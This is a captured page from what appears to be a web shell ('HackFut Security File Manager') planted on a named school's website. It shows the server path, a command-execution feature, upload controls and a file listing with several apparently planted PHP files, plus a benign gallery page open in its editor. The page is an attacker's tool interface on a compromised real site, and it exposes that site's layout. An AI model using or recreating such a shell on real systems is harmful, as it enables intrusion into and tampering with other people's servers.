HackFut Security File Manager
Current Path:
D:\Inetpub\vhosts\rahulinternationalschool.com\httpdocs
Command Execution
D:
/
Inetpub
/
vhosts
/
rahulinternationalschool.com
/
httpdocs
/
📄
..
(0 B)
📄
.htaccess
(92 B)
📁
.well-known
📄
Default.aspx
(52.77 KB)
📄
Default.aspx.cs
(373 B)
📄
NewFile
(0 B)
📄
Principal.aspx
(3.21 KB)
📄
SBHW.aspx
(5.09 KB)
📄
SBHW.aspx.cs
(395 B)
📄
Web.config
(489 B)
📄
about.aspx
(3.26 KB)
📄
about.aspx.cs
(277 B)
📄
admissionprocedure.aspx
(2.14 KB)
📄
admissionprocedure.aspx.cs
(290 B)
📄
anehin.txt
(1 B)
📄
api.php
(30.29 KB)
📄
cbse.aspx
(44.33 KB)
📄
cbse.aspx.cs
(323 B)
📄
chairman.aspx
(3.86 KB)
📄
contactus.aspx
(4.13 KB)
📄
contactus.aspx.cs
(360 B)
📁
css
📄
downloads.aspx
(1.29 KB)
📄
downloads.aspx.cs
(395 B)
📄
facilities.aspx
(10.43 KB)
📄
facilities.aspx.cs
(282 B)
📄
fees-structure.aspx
(7.47 KB)
📄
fees-structure.aspx.cs
(286 B)
📄
gallery.aspx
(6.15 KB)
📄
gallery.aspx.cs
(377 B)
📁
images
📁
img
📄
imw5a62f.php
(981 B)
📄
index-old.php
(10.95 KB)
📄
index.php
(4.44 KB)
📁
js
📄
kavda.php
(26.96 KB)
📄
manager.php
(4.44 KB)
📄
md.aspx
(3.29 KB)
📄
meewa.php
(26.96 KB)
📁
owl
📁
pdf
Editing: gallery.aspx
<%@ Page Title="" Language="C#" MasterPageFile="~/MasterPage.master" AutoEventWireup="true" CodeFile="gallery.aspx.cs" Inherits="gallery" %> <asp:Content ID="Content1" ContentPlaceHolderID="head" Runat="Server"> <style type="text/css"> .gallery-title { font-size: 36px; color: #42B32F; text-align: center; font-weight: 500; margin-bottom: 70px; } .gallery-title:after { content: ""; position: absolute; width: 7.5%; left: 46.5%; height: 45px; border-bottom: 1px solid #5e5e5e; } .filter-button { font-size: 18px; border: 1px solid blue; border-radius: 5px; text-align: center; color: #146632; margin-bottom:25px; } .btn-default:active .filter-button:active { background-color: #42B32F; color: white; } .port-image { width: 100%; } .gallery_product { margin-bottom: 0px; } .gallery .nav-tabs > li { float: none; margin-bottom: 10px; text-align: center; display: inline-block; font-family: Cambria, Georgia, serif; } .gallery img { min-width:100%; } @media (min-width:768px) { .gallery img { height: 235px; } } data-filter { background:black } @media (max-width:767px) { .btn { display: inline-block; padding: 3px 6px; } .filter-button { font-size: 32px; } } image1:hover img { -webkit-filter: grayscale(100%); /* filter: grayscale(100%); */ -webkit-transition: .3s ease-in-out; /* transition: .3s ease-in-out; */ } .example-image { height:250px; width:100%; margin-bottom:12px; outline-offset: -10px; border:1px solid black; } .btn { /*margin-left:10px; margin-top:6px;*/ } </style> <link href="css/dist/css/lightbox.css" rel="stylesheet" /> <style> .column { float: left; width: 33.33%; display: none; /* Hide all elements by default */ } /* Clear floats after rows */ .row:after { content: ""; display: table; clear: both; } /* Content */ .content { background-color: white; padding: 10px; } /* The "show" class is added to the filtered elements */ .show { display: block; } /* Style the buttons */ .btn { border: none; outline: none; padding: ; background-color: white; cursor: pointer; } .btn:hover { background-color: #ddd; } .btn.active { background-color: #666; color: white; } @media (max-width:992px) { .column { width: 100%; } .example-image { height:400px; width:100%; } } </style> <style> .Heading { font-family: 'Tangerine', serif; TEXT-ALIGN: center; margin-top: 20px; color: #dc3545; font-weight: bolder; text-decoration: underline; text-decoration-style: double; font-size: 50px; } .tabs-row { margin-right: 12px; } .images { width: 350px; height: 240px; } .tab-size { font-weight: 600; color: white; background-color: darkblue; font-size: 15px; padding: 12px; text-decoration: none; } .tab-size:hover { color: white; background-color: darkblue; text-decoration: none; } .second-row { margin-top: 20px; } @media (max-width:992px) { .images { width: 100%; height: auto; } /*.filter-button { font-size: 32px; }*/ } </style> <style> .image1 img { width:100%; height:250px; object-fit:cover; } </style> </asp:Content> <asp:Content ID="Content2" ContentPlaceHolderID="ContentPlaceHolder1" Runat="Server"> <section class="topheading"> <div class="topheadbox"> <h1 class="topheadbox">Photo gallery</h1> </div> </section> <div class="container" style="padding-top:40px;padding-bottom:40px;"> <div class="row gallerys mt-5"> <div class="gallery_product col-lg-4 col-md-6 image1 filter cm1"> <a class="example-image-link" href="img/building.jpg" target="_blank" data-lightbox="example-set" > <img class="example-image galleryimg" src="img/building.jpg"/></a> </div> </div> </div> <script type="text/javascript"> $(document).ready(function () { $(".filter-button").click(function () { var value = $(this).attr('data-filter'); if (value == "all") { $('.filter').show('1000'); } else { $(".filter").not('.' + value).hide('3000'); $('.filter').filter('.' + value).show('3000'); } }); if ($(".filter-button").removeClass("active")) { $(this).removeClass("active"); } $(this).addClass("active"); }); </script> </asp:Content>
Upload File
Create Folder